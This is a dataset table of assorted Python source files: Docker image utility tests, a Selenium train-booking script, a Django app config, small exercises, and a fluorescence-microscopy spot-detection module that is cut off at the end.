index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
12,900 | f3f8e9c9fac57bff57e4242271a1b132386f4d31 | # Copyright [2018-2020] Peter Krenesky
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from unittest import mock
from docker.errors import NotFound as DockerNotFound
from ixian.utils.filesystem import pwd
from ixian_docker.tests.conftest import TEST_IMAGE_NAME, build_test_image
from ixian_docker.modules.docker.utils.images import (
image_exists,
push_image,
pull_image,
image_exists_in_registry,
delete_image,
parse_registry,
build_image_if_needed,
build_image,
)
from ixian_docker.tests import event_streams
class TestImageExists:
"""
Tests for image existing locally
"""
def test_image_does_not_exist(self):
# delete images to ensure no leakage from other tests
delete_image(TEST_IMAGE_NAME, force=True)
assert not image_exists(TEST_IMAGE_NAME)
def test_image_exists(self, test_image):
assert image_exists(TEST_IMAGE_NAME)
class TestBuildImage:
def test_build_image(self):
# test_image fixture builds the image, just check if it exists
tag = f"{TEST_IMAGE_NAME}:latest"
assert not image_exists(TEST_IMAGE_NAME)
assert not image_exists(tag)
try:
build_test_image(tag=tag)
assert image_exists(TEST_IMAGE_NAME)
assert image_exists(tag)
finally:
delete_image(tag, force=True)
delete_image(TEST_IMAGE_NAME, force=True)
assert not image_exists(TEST_IMAGE_NAME)
assert not image_exists(tag)
def test_build_image_default_context(self, mock_docker_environment):
"""
When context=None then the PWD is used for the context
"""
build_image("Dockerfile.test", TEST_IMAGE_NAME, context=None)
mock_docker_environment.images.build.assert_called_with(
dockerfile="Dockerfile.test", path=pwd(), tag=TEST_IMAGE_NAME
)
def test_build_image_custom_tag(self):
tag = f"{TEST_IMAGE_NAME}:custom"
assert not image_exists(TEST_IMAGE_NAME)
assert not image_exists(tag)
try:
build_test_image(tag=tag)
assert image_exists(tag)
# image_exists only returns True for "latest" if no tag is given
assert not image_exists(TEST_IMAGE_NAME)
finally:
delete_image(tag, force=True)
delete_image(TEST_IMAGE_NAME, force=True)
assert not image_exists(TEST_IMAGE_NAME)
assert not image_exists(tag)
class TestDeleteImage:
def test_delete_image(self, test_image):
assert image_exists(TEST_IMAGE_NAME)
assert delete_image(TEST_IMAGE_NAME)
assert not image_exists(TEST_IMAGE_NAME)
def test_force_delete_image(self, test_image):
assert image_exists(TEST_IMAGE_NAME)
assert delete_image(TEST_IMAGE_NAME, force=True)
assert not image_exists(TEST_IMAGE_NAME)
def test_delete_image_that_does_not_exist(self):
# delete returns false if no image was deleted
assert not image_exists(TEST_IMAGE_NAME)
assert not delete_image(TEST_IMAGE_NAME)
assert not delete_image(TEST_IMAGE_NAME, force=True)
def test_delete_latest(self, test_image):
"""
The image tagged with latest may be deleted using that tag.
"""
tag = f"{TEST_IMAGE_NAME}:latest"
assert image_exists(TEST_IMAGE_NAME)
assert image_exists(tag)
assert delete_image(tag, force=True)
assert not image_exists(TEST_IMAGE_NAME)
assert not image_exists(tag)
def test_delete_image_by_wrong_tag(self, test_image):
"""
Only images with the matching tag are deleted if one is specified
"""
tag = f"{TEST_IMAGE_NAME}:wrong_tag"
assert image_exists(TEST_IMAGE_NAME)
assert not delete_image(tag, force=True)
assert image_exists(TEST_IMAGE_NAME)
# now delete using that tag, both tags will be gone because it's the same image.
build_test_image(tag=tag)
assert image_exists(TEST_IMAGE_NAME)
assert image_exists(tag)
assert delete_image(tag, force=True)
assert not image_exists(TEST_IMAGE_NAME)
assert not image_exists(tag)
class TestBuildImageIfNeeded:
default_image = f"{TEST_IMAGE_NAME}:latest"
default_call_kwargs = dict(
dockerfile="Dockerfile", path="/opt/ixian_docker", tag=default_image
)
def test_image_exists_local(self, mock_docker_environment):
"""
If image exists locally, nothing is done.
"""
build_image_if_needed(TEST_IMAGE_NAME)
mock_docker_environment.images.build.assert_not_called()
def test_image_exists_registry(self, mock_docker_environment):
"""
If doesn't exist locally but exists in the repository, it will be pulled.
"""
mock_docker_environment.images.get.side_effect = DockerNotFound("testing")
build_image_if_needed(TEST_IMAGE_NAME)
mock_docker_environment.api.pull.assert_called_with(
TEST_IMAGE_NAME, "latest", decode=True, stream=True
)
mock_docker_environment.images.build.assert_not_called()
def test_image_exists_registry_pull_not_found(self, mock_docker_environment):
"""
If the image exists in the registry, but for some reason pull returns DockerNotFound, then
fall back to building. This shouldn't happen in practice, but it's coded defensively just
in case of some weirdness.
"""
mock_docker_environment.images.get.side_effect = DockerNotFound("testing")
mock_docker_environment.api.pull.side_effect = DockerNotFound("testing")
build_image_if_needed(TEST_IMAGE_NAME)
mock_docker_environment.api.pull.assert_called_with(
TEST_IMAGE_NAME, "latest", decode=True, stream=True
)
mock_docker_environment.images.build.assert_called_with(**self.default_call_kwargs)
def test_image_exists_registry_no_pull(self, mock_docker_environment):
"""
Don't check for a remote image or pull it if pull=False. Even if the image exists remotely
a new image will be built.
"""
mock_docker_environment.images.get.side_effect = DockerNotFound("testing")
build_image_if_needed(TEST_IMAGE_NAME, pull=False)
mock_docker_environment.images.build.assert_called_with(**self.default_call_kwargs)
def test_image_exists_local_and_registry(self, mock_docker_environment):
"""
If image exists locally, nothing is done.
"""
build_image_if_needed(TEST_IMAGE_NAME)
mock_docker_environment.images.build.assert_not_called()
def test_image_does_not_exist(self, mock_docker_environment):
"""
If image doesn't exist anywhere then build.
:return:
"""
mock_docker_environment.images.get.side_effect = DockerNotFound("testing")
mock_docker_environment.images.get_registry_data.side_effect = DockerNotFound("mocked")
build_image_if_needed(TEST_IMAGE_NAME)
mock_docker_environment.images.build.assert_called_with(**self.default_call_kwargs)
build_image_if_needed(TEST_IMAGE_NAME, pull=True)
mock_docker_environment.images.build.assert_called_with(**self.default_call_kwargs)
def test_force_with_local_image(self, mock_docker_environment):
"""
if force=True then image will always build
"""
build_image_if_needed(TEST_IMAGE_NAME, force=True)
mock_docker_environment.images.build.assert_called_with(**self.default_call_kwargs)
def test_force_with_registry_image(self, mock_docker_environment):
"""
if force=True then image will always build
"""
mock_docker_environment.images.get.side_effect = DockerNotFound("testing")
build_image_if_needed(TEST_IMAGE_NAME, force=True)
mock_docker_environment.images.build.assert_called_with(**self.default_call_kwargs)
def test_force_with_local_and_registry_image(self, mock_docker_environment):
"""
if force=True then image will always build
"""
build_image_if_needed(TEST_IMAGE_NAME, force=True)
mock_docker_environment.images.build.assert_called_with(**self.default_call_kwargs)
def test_unknown_registry(self, mock_docker_environment):
"""
If the registry isn't configured, always build
"""
mock_docker_environment.images.get.side_effect = DockerNotFound("testing")
build_image_if_needed("unknown.registry.com/foo/bar")
mock_docker_environment.images.build.assert_called_with(
dockerfile="Dockerfile",
tag="unknown.registry.com/foo/bar:latest",
path="/opt/ixian_docker",
)
def test_recheck_fails(self):
"""
After pulling a re-check is run. If it fails the image is built.
"""
raise NotImplementedError
def test_custom_tag(self, mock_docker_environment):
tag = f"{TEST_IMAGE_NAME}:custom_tag"
mock_docker_environment.images.get.side_effect = DockerNotFound("testing")
mock_docker_environment.images.get_registry_data.side_effect = DockerNotFound("mocked")
build_image_if_needed(TEST_IMAGE_NAME, "custom_tag")
mock_docker_environment.images.build.assert_called_with(
dockerfile="Dockerfile", path="/opt/ixian_docker", tag=tag
)
build_image_if_needed(TEST_IMAGE_NAME, "custom_tag", pull=True)
mock_docker_environment.images.build.assert_called_with(
dockerfile="Dockerfile", path="/opt/ixian_docker", tag=tag
)
class TestParseRegistry:
def test_parse_repository(self):
assert parse_registry("foo.bar.com/test/image") == "foo.bar.com"
assert parse_registry("foo.bar.com/test/image") == "foo.bar.com"
assert parse_registry("foo.bar.com/test_image") == "foo.bar.com"
assert parse_registry("192.168.1.1/test/image") == "192.168.1.1"
assert parse_registry("192.168.1.1/test_image") == "192.168.1.1"
assert parse_registry("foo.bar.com") == "foo.bar.com"
assert parse_registry("192.168.1.1") == "192.168.1.1"
def test_parse_no_registry(self):
"""
If there is no hostname in the image name then the default repository is used.
"""
assert parse_registry("image_name_without_hostname") == "docker.io"
assert parse_registry("image_name_without_hostname/foo") == "docker.io"
assert parse_registry("image_name_without_hostname/foo/bar") == "docker.io"
assert parse_registry("imagenamewithouthostname/foo/bar") == "docker.io"
assert parse_registry("imagenamewithouthostname/foo") == "docker.io"
assert parse_registry("imagenamewithouthostname") == "docker.io"
class TestImageExistsInRegistry:
"""
Tests for image existing on remote registry
"""
def test_image_exists(self, mock_docker_environment):
assert image_exists_in_registry(TEST_IMAGE_NAME) is True
def test_image_does_not_exist(self, mock_docker_environment):
mock_docker_environment.images.get_registry_data.side_effect = DockerNotFound("mocked")
assert image_exists_in_registry(TEST_IMAGE_NAME) is False
class TestPush:
"""
Tests for pushing image to registry
"""
def test_push(self, mock_docker_environment, snapshot, capsys):
"""
Test a successful push
"""
push_image(TEST_IMAGE_NAME)
out, err = capsys.readouterr()
snapshot.assert_match(out)
def test_push_already_pushed(self, mock_docker_environment, snapshot, capsys):
"""
Test a successful push where all layers already exist on the registry
"""
mock_docker_environment.api.push = mock.Mock(
return_value=event_streams.PUSH_ALREADY_PRESENT
)
push_image(TEST_IMAGE_NAME)
out, err = capsys.readouterr()
snapshot.assert_match(out)
def test_push_tag(self, mock_docker_environment, snapshot, capsys):
"""
Test pushing with an explicit tag
"""
mock_docker_environment.api.push = mock.Mock(
return_value=event_streams.PUSH_SUCCESSFUL_CUSTOM_TAG
)
push_image(TEST_IMAGE_NAME, "custom_tag")
out, err = capsys.readouterr()
snapshot.assert_match(out)
def test_push_error(self, mock_docker_environment, snapshot, capsys):
"""
Test a push with an error
"""
mock_docker_environment.api.push = mock.Mock(
return_value=event_streams.ECR_PUSH_AUTH_FAILURE
)
push_image(TEST_IMAGE_NAME, "custom_tag")
out, err = capsys.readouterr()
snapshot.assert_match(out)
def test_push_silent(self, mock_docker_environment, snapshot, capsys):
"""
Test a successful push with silent=True
"""
push_image(TEST_IMAGE_NAME, silent=True)
out, err = capsys.readouterr()
snapshot.assert_match(out)
def test_push_error_and_silent(self, mock_docker_environment, snapshot, capsys):
"""
Test a push with an error while silent=True
"""
mock_docker_environment.api.push = mock.Mock(
return_value=event_streams.ECR_PUSH_AUTH_FAILURE
)
push_image(TEST_IMAGE_NAME, "custom_tag", silent=True)
out, err = capsys.readouterr()
snapshot.assert_match(out)
class TestPull:
"""
Tests for pulling image from registry
"""
def test_pull(self, mock_docker_environment, snapshot, capsys):
"""
Test a successful push
"""
mock_client = mock_docker_environment
pull_image(TEST_IMAGE_NAME)
mock_client.api.pull.assert_called_with(
TEST_IMAGE_NAME, "latest", stream=True, decode=True
)
out, err = capsys.readouterr()
snapshot.assert_match(out)
def test_pull_silent(self, mock_docker_environment, snapshot, capsys):
"""
Test a successful push with silent=True
"""
mock_client = mock_docker_environment
pull_image(TEST_IMAGE_NAME, silent=True)
mock_client.api.pull.assert_called_with(
TEST_IMAGE_NAME, "latest", stream=False, decode=False
)
out, err = capsys.readouterr()
snapshot.assert_match(out)
def test_pull_tag(self, mock_docker_environment, snapshot, capsys):
"""
Test pushing with an explicit tag
"""
mock_client = mock_docker_environment
pull_image(TEST_IMAGE_NAME, "custom_tag")
mock_client.api.pull.assert_called_with(
TEST_IMAGE_NAME, "custom_tag", stream=True, decode=True
)
out, err = capsys.readouterr()
snapshot.assert_match(out)
def test_pull_error(self):
"""
Test a push with an error
"""
raise NotImplementedError
def test_pull_error_and_silent(self, mock_docker_environment, snapshot, capsys):
"""
Test a push with an error while silent=True
"""
raise NotImplementedError
|
12,901 | e8f77166e61e705f2b7437a27521d7899a838c26 | #Copying Lists
my_pizzas = ['cheese', 'sausage', 'pepperoni']
friends_pizza = my_pizzas[:] #Copying my_pizzas list
my_pizzas.append('ham')
friends_pizza.append('pineapple')
#For loop to show the lists have both been changed seperately
print('My favorite pizzas are: ')
for pizza in my_pizzas:
print(pizza)
print('\nMy friends favorite pizzas are: ')
for pizza in friends_pizza:
print(pizza) |
12,902 | 25273c9840da609c4b415ab899aa92df24538bcc | from selenium import webdriver
driver = webdriver.Chrome('D:\GitRoot\pros\Selenium\chromedriver\chromedriver_win32_104\chromedriver.exe')
driver.get("https://www.thsrc.com.tw/")
element = driver.find_element(By.CSS_SELECTOR, ".slick-current .pic-l")
actions = ActionChains(driver)
actions.move_to_element(element).perform()
element = driver.find_element(By.CSS_SELECTOR, "body")
actions = ActionChains(driver)
actions.move_to_element(element, 0, 0).perform()
driver.find_element(By.ID, "a_irs").click()
driver.switch_to.frame(1)
driver.find_element(By.ID, "select_location01").click()
dropdown = driver.find_element(By.ID, "select_location01")
dropdown.find_element(By.XPATH, "//option[. = 'ๅฐๅ']").click()
driver.find_element(By.ID, "select_location02").click()
dropdown = driver.find_element(By.ID, "select_location02")
dropdown.find_element(By.XPATH, "//option[. = 'ๅฐไธญ']").click()
driver.find_element(By.ID, "Departdate02").click()
driver.find_element(By.CSS_SELECTOR, "tr:nth-child(6) > .day:nth-child(6)").click()
driver.find_element(By.ID, "toPortalTimeTable").click()
driver.find_element(By.CSS_SELECTOR, "td:nth-child(1) .fa-chevron-up").click()
driver.find_element(By.CSS_SELECTOR, "td:nth-child(1) .fa-chevron-up").click()
element = driver.find_element(By.CSS_SELECTOR, "td:nth-child(1) .fa-chevron-up")
actions = ActionChains(driver)
actions.double_click(element).perform()
driver.find_element(By.CSS_SELECTOR, "td:nth-child(1) .fa-chevron-up").click()
driver.find_element(By.CSS_SELECTOR, "td:nth-child(1) .fa-chevron-up").click()
driver.find_element(By.CSS_SELECTOR, "td:nth-child(1) .fa-chevron-up").click()
driver.find_element(By.CSS_SELECTOR, "td:nth-child(1) .fa-chevron-up").click()
driver.find_element(By.CSS_SELECTOR, ".col-lg-10").click()
driver.find_element(By.ID, "securityCode").click()
driver.find_element(By.ID, "securityCode").send_keys("VRC5")
vars["window_handles"] = driver.window_handles
driver.find_element(By.ID, "SubmitButton").click()
vars["win1111"] = wait_for_window(2000)
driver.switch_to.window(vars["win1111"])
driver.find_element(By.CSS_SELECTOR, "span:nth-child(7) .uk-radio").click()
driver.find_element(By.NAME, "SubmitButton").click()
driver.close() |
12,903 | 20b541099d848c0fe17096583879a56051cb5d2f | from django.apps import AppConfig
class FcsolutionsConfig(AppConfig):
name = 'fcsolutions'
|
12,904 | acf992b6462d6ced6d18a603dd539ed33b236f9c | #######################################################################################
# 2.3] ์ ์์ผ๋์นด๋ ํจํด์ผ๋ก ๋ฌธ์์ด ๋งค์นญ
# * ์ ๋์ค ์
ธ์ ์ฌ์ฉํ๋ ๊ฒ๊ณผ ๋์ผํ ์์ผ๋์นด๋ ํจํด์ ํ
์คํธ ๋งค์นญ์ ์ฌ์ฉํ๊ณ ์ถ๋ค(์ : *.py)
#
# fnmatch ๋ชจ๋์ fnmatch(), fnmatchcase() ์ฌ์ฉ
# ์ ๋์ค ์
ธ์ ์จ๋ณธ ์ ์์ผ๋ฏ๋ก ํด๋น ์ฑํฐ ํจ์ค
####################################################################################### |
12,905 | a3ac723e89e3cfb60b6fc3589b573bda34ec0142 | import csv
predict={}
with open('data/cost-of-cultivation.csv') as csvfile:
reader = csv.reader(csvfile)
for x in reader:
predict[x[0]]=int(x[1])
def bestcrop(budget):
rem=[]
cos=[int(i) for x,i in predict.items()]
for i in cos:
if(i>budget):
rem.append(-1)
else:
rem.append(i)
op={x:y for y,x in predict.items()}
for i in rem:
if(i!=-1):
print(op[i])
bestcrop(10000) |
12,906 | fb3e06ea86743260811f6fb24cb86038f8ec4a62 | from skimage import io
from .filters import *
from .vizu import *
from .fitters import Gaussian, Mixture
from .segmentation import *
from skimage.transform import downscale_local_mean, resize
from .utils import *
from inspect import signature
from skimage import exposure
from skimage import img_as_ubyte, img_as_uint
import matplotlib
from .spotdetector import *
from sklearn.metrics.pairwise import euclidean_distances
from sklearn.mixture import GaussianMixture
from itertools import product
import warnings
from .spot import Spot
import time
from copy import deepcopy
# warnings.simplefilter()
# @chain_methods
@extend_class(show_image)
@extend_class(show_detection_profile)
@extend_class(show_spots)
@extend_class(show_model)
class FQimage(object):
"""
Main class for spot detection and image filtering, including SNR metric and detection profile analysis.
Images are shaped in the right order: (x, y, z).
The class instance has to hold both raw and filtered image. As of now, each image, once loaded, weights around
350 Mb, and once filtered, around 700Mb.
MIP views of an image have therefore been moved to the plotting methods (MIP is recomputed at each view, which
slows down the process but lights down images because it is not an attribute).
TODO: DONE finally re-order image dimension in the right order. mistake fixed which came from matplotlib.
"""
def __init__(self, verbose=1, data=None, shape=(512, 512, 35)):
"""
Main class for spot detection and image filtering, including SNR metric and detection profile analysis.
Images are shaped in the right order: (x, y, z).
The class instance has to hold both raw and filtered image. As of now, each image, once loaded, weights around
350 Mb, and once filtered, around 700Mb.
MIP views of an image have therefore been moved to the plotting methods ( MIP is recomputed at each view, which
slows down the process but lights down images because it is not an attribute).
- DEPRECATED Methods in the class are chained what means they have to be called in a precised order (filter before detecting
spots for instance). The chain_methods decorator ensures that, plus automatically calls methods of the chain
which have not been called yet.
- Vizualisation methods have been moved to vizu.py file but are attached thanks to extend_class decorator.
Images can be either loaded here (through the data argument) or in the load method.
Attributes:
image_raw : non filtered image. Three dimensional but accepts two-dimensional adta as well.
image_filtered : filtered image. Filters are defined in the Filter module.
spots : list of Spot instances, each spot being a tuple of coordinates, a list of parameters for the
associated model.
SNR : Signal to Noise Ratio. Defined as
Sqrt(Sum((spot_signal - surrounding_mean)**2) / n) / std(surrounding_signal
*for each spot*.
_verbose : verbose
cells : nucleis (obtained through segment method).
name : path, has to be a unique identifier of each image.
mixture_model sum of all the spot models, it can be used to rebuild a modeled version of the image,
is quite time-consuming however.
background : background signal, simply defined as moving average on the signal with kernel much larger than
the usual spot width.
mask : ?
:param verbose: whether to print or not progress bars and summaries of the evolution.
shape: target shape for the image, data will be reshaped only if bigger.
:return: None
"""
if shape is not None and data is not None:
if data.shape != shape:
data = resize(data, shape, mode='constant')
self.image_raw = data
self.image_filtered = None
self.spots = []
self.SNR = None
self._verbose = verbose
self.name = None
self.mixture_model = None
self.background = None
self.mask = None
def load(self, path, shape=(1024, 1024, 35), dtype='uint16'):
"""
Loads the image from disk, returns image with axis in the natural order (deep last).
Data format should be numpy.uint8. Time complexity goes square if numpy.uint16, especially for segmentation.
Opera data format: uint16, 6.45e-8 m/pixel
Hilo data format: uint16, 2.66e-7 m/pixel
Downscaling ratio: 4.0.
For speed matters, the image is downscaled using local mean. Therefore, the image is resized using integer factors
and the reiszed image might not be exactly the asked shape.
Data format is converted to dtype (uint8) by default for the sack of speed.
TODO Might be interesting to investigate numpy.load with memorymap in the future.
TODO DONE MIP might me moved into 'show' methods for better optimization over memory charge.
:param path, shape, dtype: path of the file. shape to resize the image if necessary. dtype of the target image.
:return: None
"""
valid_dtypes = ['uint8', 'uint16']
if dtype not in valid_dtypes:
raise ValueError('dtype should be either one of %s' % ', '.join(valid_dtypes))
im = io.imread(path)
im = numpy.rollaxis(im, 0, 3)
if im.shape != shape and shape is not None:
factors = tuple(map(lambda z: int(z[0] / z[1]), zip(im.shape, shape)))
if any([f > 1 for f in factors]):
# im = resize(im, shape, mode='constant')
im = downscale_local_mean(im, factors=factors).astype(im.dtype)
# if 'conf' in path.lower():
else:
warnings.warn('Target shape is not a multiple below initial shape')
with warnings.catch_warnings():
warnings.simplefilter('ignore')
if dtype == 'uint8' and im.dtype != numpy.uint8:
im = img_as_ubyte(im)
if dtype == 'uint16' and im.dtype != numpy.uint16:
im = img_as_uint(im)
self.image_raw = im
self.name = path
def filter(self, op=GaussianFilter):
"""
Filters by first convolving the background with a gaussian filter.
Then substract the obtained image to the origin and finally re-filter with another
Gaussian filter with a variance 10 times smaller. Variance specified in utils module.
TODO To be implemented: DOG, LocalMean, and more.
:param op: operator taken from filters.py file. Must be an instance of the Filter class. (i.e. implementing
'convolve' or 'apply' methods.
:return: None, the image_filtered attribute is loaded with the filtered image.
"""
if self._verbose > 0:
print("Filtering...")
# Import from utils specified params.
params = get_filtering_params()
negative = self.image_raw - op(sigma=params['sigma_bgd']).convolve(self.image_raw)
self.image_filtered = op(sigma=params['sigma_spots']).convolve(negative)
def _detect_spots(self, detector=LocalMax, **kwargs):
"""
DEPRECATED, replaced by detect_and_fit for simplicity and speed issues.
Detect spots with a specified detector (from the spotdetector.py module)
and the detection params from utils module.
Spots are identified by their position, i.e. 'x.y.z'.
:param detector: an instance of the SpotDetector or subclass, i.e. implementing a 'locate' method returning
array of positions of spots.
:return: None, the spots attribute is a dict filled with spots (name i.e. their position 'x.y.z' and their
actual positions.)
"""
if self._verbose > 0:
print("Detecting...", end="")
spots = detector(**kwargs).locate(self.image_filtered)
# Spots are identified by their position:
self.spots = [Spot(tuple(s)) for s in spots]
if self._verbose > 0:
print('%i spots detected.' % len(self.spots))
def get_sigma_psf(self):
"""
TODO Should return the variance of the PSF in order to compute correctly the filters of the fiter method.
"""
pass
def fit_spots(self, spot_model=Mixture, kind='individual'):
"""
DEPRECATED Jump to next paragraph.
This method goes through all the detected spots and fit a specified spot_model separately to each of them.
TODO DONE If a model can not be safely fit to the spot, then the spot is deprecated and deleted from the spots list.
Spot_models are built in the fitters module.
Extract_cube comes from utils module.
A GMM from sklearn mixture model is fit to the dataset. To do so (and avoid too large dataset) the pixel values
are bucketized:
X_train will be constituted of [x, y, z] times image_raw[x, y, z] for all the x, y, z. For obvious complexity
reasons only points neighboring a spot are added to X_train are their value do not flow between 0 and 2^16-1
because that would make a huge X_train.
Even if this seems counter productive, it is much faster to do this rather than fitting a mixture of GMM
density functions on the image because by doing as below, I can focus on spots whereas the other way I would
have to fit the ENTIRE space which takes ages.
Here we get a better estimation of the spots position (local peak max is free of computation time).
:param spot_model: an instance of the SpotModel class or children from the fitters.py module, i.e. implementing
a 'fit' method and showing a 'method' attribute.
"""
model = spot_model()
# print(model)
# if model.kind == 'individual':
#
# loop = self.spots
#
# # to_delete = []
# if self._verbose > 0:
# loop = tqdm.tqdm(loop, desc="Fitting spot models...")
#
# to_delete = []
# for k in loop:
# spot = self.image_filtered[extract_cube(point=k.coordinates, side=get_focus_size())]
# centers = [get_focus_size() // 2, ] * 3
# results = model.fit(centers=centers, data=spot)
#
# # Filter spots for which a model could not be fit.
# if results:
# model.params = list(k.coordinates) + list(model.params)
# k.model = model
# else:
# to_delete.append(k)
#
# # Filter spots and store in dict
# self.spots = [k for k in self.spots if k not in to_delete]
#
# self.mixture_model = lambda x, y, z: sum([s.model.function(*s.model.params)(x, y, z) for s in self.spots])
if kind == 'collective':
mask = numpy.zeros(self.image_filtered.shape)
for s in self.spots:
mask[ellipse_in_shape(mask.shape, s.coordinates, (10, 10, 5))] = 1
mask = mask.astype(bool)
results = model.fit(centers=[s.coordinates for s in self.spots], data=self.image_filtered, mask=mask)
if results:
params = model.params.reshape(-1, 4)
for s, p in zip(self.spots, params):
s.model = Gaussian()
s.model.params = p
print(model.params)
centers = [s.coordinates for s in self.spots]
backgrounds = [[0], ] * len(self.spots)
print(centers)
print(backgrounds)
self.mixture_model = model.function
if self._verbose > 0:
time.sleep(0.1)
print('%i spots fit.' % len(self.spots))
def detect_and_fit(self,
detector=DoG,
min_sigma=1,
max_sigma=5,
sigma_ratio=1.3,
threshold='GMM',
background_kernel=25,
return_profile=False):
"""
TODO
"""
valid = ['DoG', 'LoG', 'DoH']
if detector.__name__ not in valid:
raise ValueError('Detector not adapted, use one of DoG, LoG, DoH.')
if self._verbose > 0:
print("Detecting...", end="", flush=True)
blobs = detector(
min_sigma=min_sigma,
max_sigma=max_sigma,
sigma_ratio=sigma_ratio,
threshold=threshold).locate(self.image_raw)
if blobs.shape[0] == 0:
if self._verbose > 0:
print('%i spots detected.' % blobs.shape[0])
self.spots = []
return
self.spots = [Spot(tuple(c.astype(int))) for c in blobs[:, :3]]
if self._verbose > 0:
print('%i spots detected.' % blobs.shape[0])
sigmas = blobs[:, 3]
if self._verbose > 0:
print("Fitting...", end="", flush=True)
# plans = [self.image_raw[:, :, z].astype(numpy.uint16) for z in range(0, self.image_raw.shape[-1], 10)]
warnings.simplefilter('ignore')
# background = numpy.stack(
# [rank.median(p, background_kernel) for p in plans])
# background = numpy.mean(background_stack, axis=0)
for s, p in zip(self.spots, sigmas):
s.model = Gaussian()
ex = self.image_raw[extract_cube(s.coordinates, side=background_kernel)]
background = numpy.mean(ex)
p = itertools.chain(s.coordinates,
[self.image_raw[s.coordinates] - background],
[p, p, p])
p_names = signature(s.model.function).parameters.keys()
s.model.params = {k: v for (k, v) in zip(p_names, p)}
warnings.simplefilter('default')
if self._verbose > 0:
print("fit.")
funcs = [s.model.function(*s.model.params.values()) for s in self.spots]
self.mixture_model = lambda x, y, z: sum([f(x, y, z) for f in funcs]) # + background[numpy.round(z / 10), x, y]
if return_profile:
intensities = [self.image_raw[t.coordinates] for t in self.spots]
bins = [i * numpy.iinfo(self.image_raw.dtype).max / 255 for i in range(0, 255)]
counts, _ = numpy.histogram(intensities, bins)
return numpy.cumsum(counts[::-1])[::-1]
def compute_snr(self, boxplot=False):
"""
The SNR is computed by comparing:
- value at any point which does not belong to a spot zone. A spot zone being defined
as the minimum distance between two spots (cf spot detector).
TODO DONE In the future, it might be interesting to define a 'non-spotted' zone as the ensemble of points which
are distant of more than 2*sigma_spot to the considered spot.
- average amplitude of the spots in the cell.
TODO Refactor the terrible loop in every ways.
TODO Check the division: what happens when dist is odd ?
In details, the code is fairly ugly but seems fine as the scope is reduced to the region of interest (cube
surrounding a spot) and thereafter, all the computations are performed in this reduced scope. This speeded up the
computations by roughly a e04 factor. Using a cKDTree was too slow as well. It might be worthy investigating the
combination of both (i.e. a cKDTREE within a reduced scope).
:param min_distance_appart_spots: the minimum distance for considering two spots appart. Should be greater than
utils.get_focus_size()
:return: list of snrs and their mean.
Debugging: if snrs is empty (traceback to numpy.mean) then probably no is computed for any spot. Check sigma
ceiling (beginning of for loop) and min_distance.
"""
if len(self.spots) == 0:
print('No ARN detected.')
return
# Prune blobs with overlapping vicinities:
blobs = numpy.array(
[list(map(s.model.params.__getitem__, ['center_x', 'center_y', 'center_z', 'width_x'])) for s in
self.spots])
pruned_blobs = prune_blobs(blobs, overlap=0.)
# Compute background
loop = pruned_blobs
if self._verbose > 0:
loop = tqdm.tqdm(loop, desc="Computing SNRs for each spot")
snrs = []
shape = self.image_raw.shape
for s in loop:
# Work locally:
widths = tuple([s[-1], ] * 3)
environment = self.image_raw[extract_cube(s[:3], tuple(map(lambda x: 2 * 5 * x + 1, widths)))].copy()
# Mind points which are not at the center of the local environment (close to boundaries).
center = tuple(min(p, w // 2) for (p, w) in zip(s[:3], environment.shape))
noise_radius_ratio = 2
mask_noise, mask_spot = ellipsis(tuple(map(lambda x: noise_radius_ratio * 2 * x, widths)),
environment.shape,
center,
hole_radius_ratio=1 / noise_radius_ratio)
# get the spot signal
spot_signal = environment[mask_spot]
# Now filter it out from the environment
noise_signal = environment[mask_noise]
# Now compute the SNR
mean_noise = numpy.mean(noise_signal)
energy_noise = numpy.std(noise_signal)
energy_spot = numpy.sqrt(numpy.sum((spot_signal - mean_noise) ** 2) / spot_signal.shape[0])
if energy_noise == 0:
continue
else:
snr = energy_spot / energy_noise
snrs.append(snr)
self.SNR = snrs
if len(snrs) == 0:
print('No SNR computed.')
self.SNR = None
if boxplot:
f, ax = plt.subplots()
ax.boxplot(snrs)
ax.set_title('SNRs computed.')
ax.grid()
f.show()
def assign(self):
"""
assign spots and models and stuff to each sub-cell sgemented within the mother image.
:return: None
"""
for s in self.spots:
if self.cells[s[:2]] == 0:
label = find_nearest_region(self.cells, *s[:2])
else:
label = self.cells[s[:2]]
s.region = label
@extend_class(show_nucleis)
class DAPIimage(FQimage):
def __init__(self, verbose=1, data=None, shape=(512, 512, 35)):
super(DAPIimage, self).__init__(verbose=verbose, data=data, shape=shape)
self.nucleis = None
def segment(self, sg=NucleiSegmenter()):
"""
This method is intended at segmenting the nucleis in DAPIimage on Mask images (not FISH). However basic, it seems
to give a rather good.
approximation. The workflow is MIP -> local grad -> Otsu thresholding -> Connected components labelling ->
Filtering components based on their size (using either hand-threshold or KMeans to distinguish actual cells
from noise components.
:param sg: A segmenter object.
:return: None.
"""
# mask_path = self.name.replace('w1', 'w3').replace('561', '405')
# cell_mask = io.imread(mask_path)
# self.mask = numpy.swapaxes(cell_mask, 0, 2)
with warnings.catch_warnings():
warnings.simplefilter('ignore')
if self._verbose > 0:
print('Segmenting...', end='', flush=True)
self.nucleis = sg.method(self.image_raw)
if self._verbose > 0:
print('%i nucleis found.' % (numpy.unique(self.nucleis).shape[0] - 1))
def split(self):
"""
Simply counting the number of spots per
label does not work properly as some region do not have closed boundaries (for instance the segmented boundary
has a 'C' shape but the cell is round. In this case spots will not be labeled as belonging to the 'C' region
but they actually belong to the underlying cell which is badly segmented.
DEPRECATED
:param :
:return:
"""
sub_images = []
for region in regionprops(self.cells):
minr, minc, maxr, maxc = region.bbox
sub_image = self.image_raw[max(0, minr - 10):maxr, max(0, minc - 10):maxc, :]
sub_images.append(FQimage(data=sub_image))
return sub_images
@extend_class(show_cells)
class CYTimage(FQimage):
def __init__(self, nuclei_image, verbose=1, data=None, shape=(512, 512, 35)):
super(CYTimage, self).__init__(verbose=verbose, data=data, shape=shape)
self.nuclei_image = nuclei_image
if numpy.unique(nuclei_image).shape[0] == 1:
raise UserWarning('No nuclei detected on the given nuclei image.')
self.cells = None
def segment(self, sg=CytoSegmenter()):
"""
This method is intended at segmenting the nucleis in DAPIimage on Mask images (not FISH). However basic, it seems
to give a rather good.
